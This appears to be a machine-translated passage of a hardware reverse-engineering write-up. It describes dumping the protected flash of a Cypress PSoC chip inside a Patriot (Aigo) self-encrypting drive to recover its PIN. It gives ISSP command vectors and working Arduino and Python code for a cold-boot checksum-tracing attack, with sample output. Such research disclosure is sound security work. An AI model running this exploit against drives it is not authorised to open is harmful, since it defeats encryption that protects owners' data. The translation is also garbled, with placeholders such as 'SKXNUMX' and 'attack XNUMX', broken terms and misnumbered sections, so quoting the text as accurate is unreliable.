នេះគឺជាផ្នែកទី 8671 និងចុងក្រោយនៃអត្ថបទអំពីការលួចយកដ្រាយដែលអ៊ិនគ្រីបដោយខ្លួនឯងខាងក្រៅ។ ខ្ញុំសូមរំលឹកអ្នកថា កាលពីពេលថ្មីៗនេះ សហសេវិកម្នាក់បាននាំ Hard Drive ម៉ាក Patriot (Aigo) SKXNUMX មកខ្ញុំ ហើយខ្ញុំបានសម្រេចចិត្តបញ្ច្រាសវា ហើយឥឡូវនេះខ្ញុំកំពុងចែករំលែកអ្វីដែលចេញពីវា។ មុននឹងអានបន្ត ត្រូវប្រាកដថាអាន ផ្នែកដំបូង អត្ថបទ

4. យើងចាប់ផ្តើមចាក់សំរាមចេញពីដ្រាយវ៍ពន្លឺ PSoC ខាងក្នុង
5. ពិធីការ ISSP
– ៥.១. តើអ្វីទៅជា ISSP
– ៥.២។ Demystifying Vectors
– ៥.៣។ ទំនាក់ទំនងជាមួយ PSoC
– ៥.៤។ ការកំណត់អត្តសញ្ញាណនៃការចុះឈ្មោះនៅលើបន្ទះឈីប
– ៥.៥។ ប៊ីតសុវត្ថិភាព
6. ការវាយប្រហារដំបូង (បរាជ័យ)៖ ROMX
7. ការវាយប្រហារលើកទី XNUMX: Cold Boot Tracing
– ៧.១. ការអនុវត្ត
– ៧.២។ ការអានលទ្ធផល
– ៧.៣។ ការកសាងប្រព័ន្ធគោលពីរ Flash
– ៧.៤។ ស្វែងរកអាសយដ្ឋានផ្ទុកកូដ PIN
– ៧.៥។ ការ​បោះ​ចោល​ប្លុក​លេខ ១២៦
– ៧.៦។ ការស្តារកូដ PIN
8. តើមានអ្វីបន្ទាប់?
9 ។ សេចក្តីសន្និដ្ឋាន

4. យើងចាប់ផ្តើមចាក់សំរាមចេញពីដ្រាយវ៍ពន្លឺ PSoC ខាងក្នុង

ដូច្នេះ អ្វី​គ្រប់​យ៉ាង​បង្ហាញ​ថា (ដូច​ដែល​យើង​បាន​បង្កើត​នៅ​ក្នុង [ផ្នែក​ដំបូង]()) ថា​កូដ PIN ត្រូវ​បាន​រក្សា​ទុក​ក្នុង​ជម្រៅ​ពន្លឺ​នៃ PSoC។ ដូច្នេះ យើង​ត្រូវ​អាន​ជម្រៅ​ពន្លឺ​ទាំងនេះ។ ផ្នែកខាងមុខនៃការងារចាំបាច់៖

• គ្រប់គ្រង "ការទំនាក់ទំនង" ជាមួយ microcontroller;
• ស្វែងរកវិធីដើម្បីពិនិត្យមើលថាតើ "ការទំនាក់ទំនង" នេះត្រូវបានការពារពីការអានពីខាងក្រៅឬអត់។
• រកវិធីដើម្បីរំលងការការពារ។

មានកន្លែងពីរដែលវាសមហេតុផលក្នុងការស្វែងរកលេខកូដ PIN ដែលមានសុពលភាព៖

• អង្គចងចាំពន្លឺខាងក្នុង;
• SRAM ដែលលេខកូដ pin អាចត្រូវបានរក្សាទុកដើម្បីប្រៀបធៀបវាជាមួយនឹងលេខកូដ pin ដែលបានបញ្ចូលដោយអ្នកប្រើប្រាស់។

សម្លឹងមើលទៅមុខ ខ្ញុំនឹងកត់សម្គាល់ថាខ្ញុំនៅតែអាចចាក់ចោលនូវ PSoC flash drive ខាងក្នុង - ឆ្លងកាត់ប្រព័ន្ធសុវត្ថិភាពរបស់វាដោយប្រើការវាយប្រហារផ្នែករឹងដែលហៅថា "cold boot tracing" - បន្ទាប់ពីបញ្ច្រាសសមត្ថភាពដែលមិនមានឯកសារនៃពិធីការ ISSP ។ វាអនុញ្ញាតឱ្យខ្ញុំបោះចោលកូដ PIN ពិតប្រាកដដោយផ្ទាល់។

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

កូដកម្មវិធីចុងក្រោយ៖

• កូដ Arduino សម្រាប់ HSSP;
• កម្មវិធីបញ្ជា Python និង ISSP disassembler.

5. ពិធីការ ISSP

៥.១. តើអ្វីទៅជា ISSP

"ការប្រាស្រ័យទាក់ទង" ជាមួយ microcontroller អាចមានន័យខុសគ្នា៖ ពី "អ្នកលក់ទៅអ្នកលក់" ដល់អន្តរកម្មដោយប្រើពិធីការសៀរៀល (ឧទាហរណ៍ ICSP សម្រាប់ Microchip's PIC)។

Cypress មានពិធីការកម្មសិទ្ធិផ្ទាល់ខ្លួនសម្រាប់រឿងនេះ ដែលហៅថា ISSP (ពិធីការសរសេរកម្មវិធីសៀរៀលក្នុងប្រព័ន្ធ) ដែលត្រូវបានពិពណ៌នាដោយផ្នែកនៅក្នុង ភាព​ជាក់លាក់​ខាង​បច្ចេកទេស. ប៉ាតង់ US7185162 ក៏ផ្តល់ព័ត៌មានមួយចំនួនផងដែរ។ វាក៏មានសមមូល OpenSource ដែលហៅថា HSSP (យើងនឹងប្រើវានៅពេលក្រោយបន្តិច)។ ISSP ដំណើរការដូចខាងក្រោមៈ

• ចាប់ផ្ដើម PSoC ឡើងវិញ;
• បញ្ចេញលេខវេទមន្តទៅលេខសម្ងាត់ទិន្នន័យសៀរៀលនៃ PSoC នេះ; ដើម្បីចូលទៅក្នុងរបៀបសរសេរកម្មវិធីខាងក្រៅ;
• ផ្ញើពាក្យបញ្ជាដែលជាខ្សែអក្សរវែងហៅថា "វ៉ិចទ័រ" ។

ឯកសារ ISSP កំណត់វ៉ិចទ័រទាំងនេះសម្រាប់តែពាក្យបញ្ជាមួយចំនួនតូចប៉ុណ្ណោះ៖

• ចាប់ផ្តើម - ១
• ចាប់ផ្តើម - ១
• Initialize-3 (ជម្រើស 3V និង 5V)
• ID-SETUP
• អាន-ID-WORD
• SET-BLOCK-NUM: 10011111010ddddddddd111 ដែល dddddddd=block #
• លុបច្រើន
• កម្មវិធី-ប្លុក
• ផ្ទៀងផ្ទាត់-រៀបចំ
• អាន-BYTE: 10110aaaaaaZDDDDDDDDZ1 ដែល DDDDDDDD = ទិន្នន័យចេញ aaaaaa = អាសយដ្ឋាន (6 ប៊ីត)
• WRITE-BYTE: 10010aaaaaaadddddddd111, ដែល ddddddddd = ទិន្នន័យនៅក្នុង, aaaaaa = អាសយដ្ឋាន (6 ប៊ីត)
• សុវត្ថិភាព
• ពិនិត្យ-រៀបចំ
• READ-CheckSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 ដែល DDDDDDDDDDDDDDDD = ទិន្នន័យចេញ៖ ការពិនិត្យឧបករណ៍
• លុបប្លុក

ឧទាហរណ៍ វ៉ិចទ័រសម្រាប់ Initialize-2៖

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

វ៉ិចទ័រទាំងអស់មានប្រវែងដូចគ្នា៖ 22 ប៊ីត។ ឯកសារ HSSP មានព័ត៌មានបន្ថែមមួយចំនួននៅលើ ISSP៖ "វ៉ិចទ័រ ISSP គ្មានអ្វីលើសពីលំដាប់បន្តិចដែលតំណាងឱ្យសំណុំនៃការណែនាំ។"

៥.២. Demystifying Vectors

ចូរយើងស្វែងយល់ថាតើមានអ្វីកើតឡើងនៅទីនេះ។ ដំបូង ខ្ញុំបានសន្មត់ថាវ៉ិចទ័រដូចគ្នាទាំងនេះគឺជាកំណែដើមនៃការណែនាំ M8C ប៉ុន្តែបន្ទាប់ពីពិនិត្យមើលសម្មតិកម្មនេះ ខ្ញុំបានរកឃើញថា opcodes នៃប្រតិបត្តិការមិនត្រូវគ្នាទេ។

បន្ទាប់មកខ្ញុំបាន google វ៉ិចទ័រខាងលើ ហើយបានឆ្លងកាត់ វានៅទីនេះ ការសិក្សាមួយដែលអ្នកនិពន្ធ ទោះបីគាត់មិនបានរៀបរាប់លម្អិតក៏ដោយ ផ្តល់គន្លឹះមានប្រយោជន៍មួយចំនួន៖ “ការណែនាំនីមួយៗចាប់ផ្តើមដោយបីប៊ីតដែលត្រូវគ្នានឹងមេម៉ូនិកមួយក្នុងចំណោមបួន (អានពី RAM សរសេរទៅ RAM អានចុះឈ្មោះ សរសេរចុះឈ្មោះ) ។ បន្ទាប់មកមាន 8 ប៊ីតអាស័យដ្ឋាន បន្តដោយ 8 ប៊ីតទិន្នន័យ (អាន ឬសរសេរ) ហើយចុងក្រោយ ប៊ីតឈប់បី។

បន្ទាប់មកខ្ញុំអាចប្រមូលព័ត៌មានមានប្រយោជន៍មួយចំនួនពីផ្នែក Supervisory ROM (SROM)។ សៀវភៅណែនាំបច្ចេកទេស. SROM គឺជារ៉ូមដែលសរសេរកូដរឹងនៅក្នុង PSoC ដែលផ្តល់មុខងារប្រើប្រាស់ (តាមរបៀបស្រដៀងគ្នាទៅនឹង Syscall) សម្រាប់កូដកម្មវិធីដែលកំពុងដំណើរការក្នុងចន្លោះអ្នកប្រើប្រាស់៖

• 00h: SWBootReset
• 01h: ReadBlock
• ០២ ម៉ោង៖ WriteBlock
• ០៣ ម៉ោង៖ លុបប្លុក
• ម៉ោង 06: TableRead
• ម៉ោង 07: CheckSum
• ម៉ោង ០៨៖ ក្រិតតាមខ្នាត ០
• ម៉ោង ០៨៖ ក្រិតតាមខ្នាត ០

ដោយការប្រៀបធៀបឈ្មោះវ៉ិចទ័រទៅនឹងមុខងារ SROM យើងអាចគូសផែនទីប្រតិបត្តិការផ្សេងៗដែលគាំទ្រដោយពិធីការនេះទៅនឹងប៉ារ៉ាម៉ែត្រ SROM ដែលរំពឹងទុក។ សូមអរគុណដល់ចំណុចនេះ យើងអាចឌិកូដវ៉ិចទ័រ ISSP បីប៊ីតដំបូងបាន៖

• 100 => "wrem"
• 101 => "rdmem"
• 110 => "ខុស"
• 111 => "rdreg"

ទោះជាយ៉ាងណាក៏ដោយ ការយល់ដឹងពេញលេញអំពីដំណើរការនៅលើបន្ទះឈីបអាចទទួលបានតាមរយៈការទំនាក់ទំនងដោយផ្ទាល់ជាមួយ PSoC ប៉ុណ្ណោះ។

៥.៣. ទំនាក់ទំនងជាមួយ PSoC

ចាប់តាំងពី Dirk Petrautsky មានរួចហើយ ច្រក លេខកូដ HSSP របស់ Cypress នៅលើ Arduino ខ្ញុំបានប្រើ Arduino Uno ដើម្បីភ្ជាប់ទៅឧបករណ៍ភ្ជាប់ ISSP នៃក្ដារចុច។

សូមចំណាំថានៅក្នុងវគ្គសិក្សានៃការស្រាវជ្រាវរបស់ខ្ញុំ ខ្ញុំបានផ្លាស់ប្តូរលេខកូដរបស់ Dirk បន្តិច។ អ្នកអាចស្វែងរកការកែប្រែរបស់ខ្ញុំនៅលើ GitHub៖ នៅទីនេះ និងអក្សរ Python ដែលត្រូវគ្នាសម្រាប់ការទំនាក់ទំនងជាមួយ Arduino នៅក្នុងឃ្លាំងរបស់ខ្ញុំ cypress_psoc_tools.

ដូច្នេះដោយប្រើ Arduino ដំបូងខ្ញុំប្រើតែវ៉ិចទ័រ "ផ្លូវការ" សម្រាប់ "ទំនាក់ទំនង" ។ ខ្ញុំបានព្យាយាមអាន ROM ខាងក្នុងដោយប្រើពាក្យបញ្ជា VERIFY ។ តាម​ការ​រំពឹង​ទុក ខ្ញុំ​មិន​អាច​ធ្វើ​បាន​ទេ។ ប្រហែលជាដោយសារតែការពិតដែលថាការអានប៊ីតការពារត្រូវបានធ្វើឱ្យសកម្មនៅខាងក្នុងដ្រាយវ៍ពន្លឺ។

បន្ទាប់​មក​ខ្ញុំ​បាន​បង្កើត​វ៉ិចទ័រ​សាមញ្ញ​មួយ​ចំនួន​របស់​ខ្ញុំ​សម្រាប់​ការ​សរសេរ និង​ការ​អាន memory/register។ សូមចំណាំថាយើងអាចអាន SROM ទាំងមូលទោះបីជា flash drive ត្រូវបានការពារក៏ដោយ!

៥.៤. ការកំណត់អត្តសញ្ញាណនៃការចុះឈ្មោះនៅលើបន្ទះឈីប

បន្ទាប់ពីមើលវ៉ិចទ័រ "រុះរើ" ខ្ញុំបានរកឃើញថាឧបករណ៍នេះប្រើការចុះឈ្មោះដែលគ្មានឯកសារ (0xF8-0xFA) ដើម្បីបញ្ជាក់កូដ M8C ដែលត្រូវបានប្រតិបត្តិដោយផ្ទាល់ដោយឆ្លងកាត់ការការពារ។ វាអនុញ្ញាតឱ្យខ្ញុំដំណើរការ opcode ផ្សេងៗដូចជា "ADD", "MOV A, X", "PUSH" ឬ "JMP" ។ សូមអរគុណដល់ពួកគេ (ដោយមើលពីផលប៉ះពាល់ដែលពួកគេមានលើការចុះឈ្មោះ) ខ្ញុំអាចកំណត់ថាតើការចុះឈ្មោះដែលគ្មានឯកសារណាមួយគឺជាការចុះឈ្មោះធម្មតា (A, X, SP និង PC) ។

ជាលទ្ធផល កូដ "ផ្តាច់ចេញ" ដែលបង្កើតដោយឧបករណ៍ HSSP_disas.rb មើលទៅដូចនេះ (ខ្ញុំបានបន្ថែមមតិយោបល់សម្រាប់ភាពច្បាស់លាស់)៖

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # сброс флагов
[DE C0 1C] wrreg SP (f6), 0x00      # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A     # обязательный аргумент для SSC
[9F 20 7C] wrmem KEY2, 0x03     # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00     # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... до 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM-указатель для выходных данных
[DF 26 1C] wrreg opc1 (f9), 0x30        # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID для вызова SSC
[DE 00 DC] wrreg A (f0), 0x06       # номер "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # Недокумментированная операция: выполнить внешний опкод

៥.៥. ប៊ីតសុវត្ថិភាព

នៅដំណាក់កាលនេះខ្ញុំអាចទាក់ទងជាមួយ PSoC រួចហើយ ប៉ុន្តែខ្ញុំនៅតែមិនមានព័ត៌មានដែលអាចទុកចិត្តបានអំពីប៊ីតសុវត្ថិភាពនៃ flash drive ទេ។ ខ្ញុំមានការភ្ញាក់ផ្អើលយ៉ាងខ្លាំងដោយការពិតដែលថា Cypress មិនផ្តល់ឱ្យអ្នកប្រើប្រាស់នូវមធ្យោបាយណាមួយដើម្បីពិនិត្យមើលថាតើការការពារត្រូវបានធ្វើឱ្យសកម្ម។ ខ្ញុំបានជីកជ្រៅទៅក្នុង Google ដើម្បីយល់ថាលេខកូដ HSSP ដែលផ្តល់ដោយ Cypress ត្រូវបានធ្វើបច្ចុប្បន្នភាពបន្ទាប់ពី Dirk បានចេញផ្សាយការកែប្រែរបស់គាត់។ ហើយ​ដូច្នេះ! វ៉ិចទ័រថ្មីនេះបានបង្ហាញខ្លួន៖

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # неизвестные аргументы
[9F E0 1C] wrmem 0xFF, 0x00 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # недокументированный syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

ដោយប្រើវ៉ិចទ័រនេះ (សូមមើល read_security_data ក្នុង psoc.py) យើងទទួលបានប៊ីតសុវត្ថិភាពទាំងអស់នៅក្នុង SRAM នៅ 0x80 ដែលមានពីរប៊ីតក្នុងមួយប្លុកដែលបានការពារ។

លទ្ធផលគឺធ្លាក់ទឹកចិត្ត: អ្វីគ្រប់យ៉ាងត្រូវបានការពារនៅក្នុងរបៀប "បិទការអាននិងការសរសេរខាងក្រៅ" ។ ដូច្នេះហើយ យើងមិនត្រឹមតែមិនអាចអានអ្វីពី flash drive ប៉ុណ្ណោះទេ ប៉ុន្តែយើងក៏មិនអាចសរសេរអ្វីបានដែរ (ឧទាហរណ៍ ដើម្បីដំឡើង ROM dumper នៅទីនោះ)។ ហើយមធ្យោបាយតែមួយគត់ដើម្បីបិទការការពារគឺត្រូវលុបបន្ទះឈីបទាំងមូលទាំងស្រុង។ 🙁

6. ការវាយប្រហារដំបូង (បរាជ័យ)៖ ROMX

ទោះយ៉ាងណាក៏ដោយ យើងអាចសាកល្បងប្រើល្បិចដូចខាងក្រោមនេះ៖ ដោយសារយើងមានសមត្ថភាពក្នុងការប្រតិបត្តិកូដតាមអំពើចិត្ត ហេតុអ្វីមិនប្រតិបត្តិ ROMX ដែលប្រើសម្រាប់អានអង្គចងចាំពន្លឺ? វិធីសាស្រ្តនេះមានឱកាសជោគជ័យល្អ។ ដោយសារតែមុខងារ ReadBlock ដែលអានទិន្នន័យពី SROM (ដែលត្រូវបានប្រើដោយវ៉ិចទ័រ) ពិនិត្យមើលថាតើវាត្រូវបានហៅពី ISSP ដែរឬទេ។ ទោះជាយ៉ាងណាក៏ដោយ ROMX opcode ដែលអាចស្រមៃបានប្រហែលជាមិនមានការត្រួតពិនិត្យបែបនេះទេ។ ដូច្នេះនេះគឺជាកូដ Python (បន្ទាប់ពីបន្ថែមថ្នាក់ជំនួយពីរបីទៅកូដ Arduino)៖

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = 0
    write_reg(0xF3, i&0xFF)     # X = 0
    exec_opcodes("x28x30x40")    # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print ROM byte

ជាអកុសលលេខកូដនេះមិនដំណើរការទេ។ 🙁 ឬផ្ទុយទៅវិញវាដំណើរការ ប៉ុន្តែនៅលទ្ធផលយើងទទួលបានកូដកូដផ្ទាល់ខ្លួនរបស់យើង (0x28 0x30 0x40)! ខ្ញុំមិនគិតថាមុខងារដែលត្រូវគ្នារបស់ឧបករណ៍គឺជាធាតុផ្សំនៃការការពារការអាននោះទេ។ នេះ​គឺ​ដូចជា​ល្បិច​វិស្វកម្ម​ជាង៖ ពេល​ប្រតិបត្តិ​កូដ​ខាងក្រៅ ឡានក្រុង ROM ត្រូវ​បាន​បញ្ជូន​បន្ត​ទៅ​បណ្ដោះអាសន្ន។

7. ការវាយប្រហារលើកទី XNUMX: Cold Boot Tracing

ដោយសារល្បិច ROMX មិនដំណើរការ ខ្ញុំចាប់ផ្តើមគិតអំពីការប្រែប្រួលមួយផ្សេងទៀតនៃល្បិចនេះ - ពិពណ៌នានៅក្នុងការបោះពុម្ពផ្សាយ "បញ្ចេញពន្លឺច្រើនពេកលើការការពារកម្មវិធីបង្កប់របស់ Microcontroller".

៤.១.១. ការអនុវត្ត

ឯកសារ ISSP ផ្តល់វ៉ិចទ័រខាងក្រោមសម្រាប់ CHECKSUM-SETUP៖

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

នេះហៅថាមុខងារ SROM 0x07 ដូចដែលបានបង្ហាញក្នុងឯកសារ (អណ្តូងរ៉ែទ្រេត)៖

មុខងារ​នេះ​ពិនិត្យ​ផ្ទៀងផ្ទាត់។ វាគណនាមូលប្បទានប័ត្រ 16 ប៊ីតនៃចំនួនប្លុកដែលបានបញ្ជាក់ដោយអ្នកប្រើប្រាស់នៅក្នុងធនាគារពន្លឺមួយ ដោយចាប់ផ្តើមពីសូន្យ។ ប៉ារ៉ាម៉ែត្រ BLOCKID ត្រូវបានប្រើដើម្បីឆ្លងកាត់ចំនួនប្លុកដែលនឹងត្រូវបានប្រើនៅពេលគណនាមូលប្បទានប័ត្រ។ តម្លៃនៃ "1" នឹងគណនាតែ checksum សម្រាប់ប្លុកសូន្យប៉ុណ្ណោះ។ ចំណែកឯ "0" នឹងធ្វើឱ្យមូលប្បទានប័ត្រសរុបនៃ 256 ប្លុកនៃធនាគារពន្លឺត្រូវបានគណនា។ មូលប្បទានប័ត្រ 16 ប៊ីតត្រូវបានបញ្ជូនមកវិញតាមរយៈ KEY1 និង KEY2 ។ ប៉ារ៉ាម៉ែត្រ KEY1 រក្សាទុកលំដាប់ទាប 8 ប៊ីតនៃ checksum ហើយប៉ារ៉ាម៉ែត្រ KEY2 រក្សាទុកលំដាប់ខ្ពស់ 8 ប៊ីត។ សម្រាប់ឧបករណ៍ដែលមាន flash banks ជាច្រើន មុខងារ checksum ត្រូវបានហៅសម្រាប់នីមួយៗដាច់ដោយឡែកពីគ្នា។ លេខធនាគារដែលវានឹងដំណើរការត្រូវបានកំណត់ដោយការចុះឈ្មោះ FLS_PR1 (ដោយការកំណត់ប៊ីតនៅក្នុងវាដែលត្រូវគ្នាទៅនឹងធនាគារពន្លឺគោលដៅ)។

ចំណាំថានេះគឺជា checksum សាមញ្ញ: បៃត្រូវបានបន្ថែមយ៉ាងសាមញ្ញមួយបន្ទាប់ពីផ្សេងទៀត។ មិនមានលក្ខណៈពិសេស CRC ដ៏អស្ចារ្យទេ។ លើសពីនេះទៀតដោយដឹងថាស្នូល M8C មានសំណុំតូចមួយនៃការចុះឈ្មោះខ្ញុំបានសន្មត់ថានៅពេលគណនា checksum តម្លៃមធ្យមនឹងត្រូវបានកត់ត្រានៅក្នុងអថេរដូចគ្នាដែលនៅទីបំផុតនឹងទៅលទ្ធផល: KEY1 (0xF8) / KEY2 ( 0xF9) ។

ដូច្នេះតាមទ្រឹស្តី ការវាយប្រហាររបស់ខ្ញុំមើលទៅដូចនេះ៖

1. យើងភ្ជាប់តាមរយៈ ISSP ។
2. យើងចាប់ផ្តើមការគណនា checksum ដោយប្រើវ៉ិចទ័រ CHECKSUM-SETUP ។
3. យើងចាប់ផ្តើមដំណើរការខួរក្បាលឡើងវិញបន្ទាប់ពីពេលវេលាជាក់លាក់ T.
4. យើងអាន RAM ដើម្បីទទួលបាន checksum C បច្ចុប្បន្ន។
5. ធ្វើជំហានទី 3 និងទី 4 ម្តងទៀតដោយបង្កើន T បន្តិចម្ដងៗ។
6. យើងសង្គ្រោះទិន្នន័យពី flash drive ដោយដក checksum C មុនពីបច្ចុប្បន្ន។

ទោះយ៉ាងណាក៏ដោយ មានបញ្ហាមួយ៖ វ៉ិចទ័រ Initialize-1 ដែលយើងត្រូវផ្ញើបន្ទាប់ពីចាប់ផ្តើមឡើងវិញ សរសេរជាន់លើ KEY1 និង KEY2៖

1100101000000000000000  # Магия, переводящая PSoC в режим программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # контрольная сумма перезаписывается здесь
[9F 20 7C] wrmem KEY2, 0x03 # и здесь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

កូដនេះសរសេរជាន់លើ checksum ដ៏មានតម្លៃរបស់យើងដោយហៅ Calibrate1 (មុខងារ SROM 9)... ប្រហែលជាយើងអាចផ្ញើលេខវេទមន្ត (ពីដើមកូដខាងលើ) ដើម្បីចូលទៅក្នុងរបៀបសរសេរកម្មវិធី រួចអាន SRAM? ហើយបាទវាដំណើរការ! កូដ Arduino ដែលអនុវត្តការវាយប្រហារនេះគឺសាមញ្ញណាស់៖

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

1. អាន checkum_delay ។
2. ដំណើរការការគណនា checksum (send_checksum_v) ។
3. រង់ចាំរយៈពេលជាក់លាក់មួយ; ដោយគិតគូរពីបញ្ហាដូចខាងក្រោមៈ
   • ខ្ញុំ​បាន​ចំណាយ​ពេល​ជា​ច្រើន​រហូត​ដល់​ខ្ញុំ​រក​ឃើញ​ថា​វា​ប្រែ​ទៅ​ជា​យ៉ាង​ណា ពន្យារពេលមីក្រូវិនាទី ដំណើរការបានត្រឹមត្រូវតែជាមួយនឹងការពន្យារពេលមិនលើសពី 16383 μs;
   • ហើយបន្ទាប់មកម្តងទៀតបានសម្លាប់ពេលវេលាដូចគ្នារហូតដល់ខ្ញុំបានរកឃើញថាការពន្យាពេលមីក្រូវិនាទី ប្រសិនបើ 0 ត្រូវបានបញ្ជូនទៅវាជាធាតុបញ្ចូល វាដំណើរការមិនត្រឹមត្រូវទាំងស្រុង!
4. ចាប់ផ្ដើម PSoC ចូលទៅក្នុងរបៀបសរសេរកម្មវិធី (យើងគ្រាន់តែផ្ញើលេខវេទមន្ត ដោយមិនផ្ញើវ៉ិចទ័រចាប់ផ្តើម) ។

លេខកូដចុងក្រោយនៅក្នុង Python៖

for delay in range(0, 150000):  # задержка в микросекундах
    for i in range(0, 10):      # количество считывания для каждойиз задержек
        try:
            reset_psoc(quiet=True)  # перезагрузка и вход в режим программирования
            send_vectors()      # отправка инициализирующих векторов
            ser.write("x85"+struct.pack(">I", delay)) # вычислить контрольную сумму + перезагрузиться после задержки
            res = ser.read(1)       # считать arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # открыть последовательный порт
            continue
        print "%05d %02X %02X %02X" % (delay,      # считать RAM-байты
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

សរុបមក កូដនេះធ្វើអ្វី៖

1. ចាប់ផ្ដើម PSoC ឡើងវិញ (ហើយផ្ញើលេខវេទមន្ត)។
2. ផ្ញើវ៉ិចទ័រការចាប់ផ្តើមពេញលេញ។
3. ហៅទៅមុខងារ Arduino Cmnd_STK_START_CSUM (0x85) ដែលការពន្យារពេលក្នុងមីក្រូវិនាទីត្រូវបានឆ្លងកាត់ជាប៉ារ៉ាម៉ែត្រ។
4. អានមូលប្បទានប័ត្រ (0xF8 និង 0xF9) និងការចុះឈ្មោះគ្មានឯកសារ 0xF1 ។

លេខកូដនេះត្រូវបានប្រតិបត្តិ 10 ដងក្នុង 1 មីក្រូវិនាទី។ 0xF1 ត្រូវ​បាន​រួម​បញ្ចូល​នៅ​ទីនេះ​ព្រោះ​វា​ជា​ការ​ចុះ​ឈ្មោះ​តែ​មួយ​គត់​ដែល​បាន​ផ្លាស់​ប្តូ​រ​នៅ​ពេល​គណនា checksum ។ ប្រហែលជាវាជាប្រភេទនៃអថេរបណ្តោះអាសន្នមួយចំនួនដែលប្រើដោយឯកតាតក្កវិជ្ជានព្វន្ធ។ ចំណាំការ hack ដ៏អាក្រក់ដែលខ្ញុំប្រើដើម្បីកំណត់ Arduino ឡើងវិញដោយប្រើ picocom នៅពេលដែល Arduino ឈប់បង្ហាញសញ្ញានៃជីវិត (មិនដឹងមូលហេតុ)។

៧.២. ការអានលទ្ធផល

លទ្ធផលនៃស្គ្រីប Python មើលទៅដូចនេះ (ងាយស្រួលអាន)៖

DELAY F1 F8 F9  # F1 – вышеупомянутый неизвестный регистр
                  # F8 младший байт контрольной суммы
                  # F9 старший байт контрольной суммы

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # контрольная сумма сбрасывается в 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1-й байт: 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2-й байт: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # понятия не имею, что здесь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # Снова E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Хмммммм
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # А, дошло! Вот он же перенос в старший байт
00063 01 17 01
[...]
00075 CC 17 01  # Итак, 0x117-0xE7: 0x30

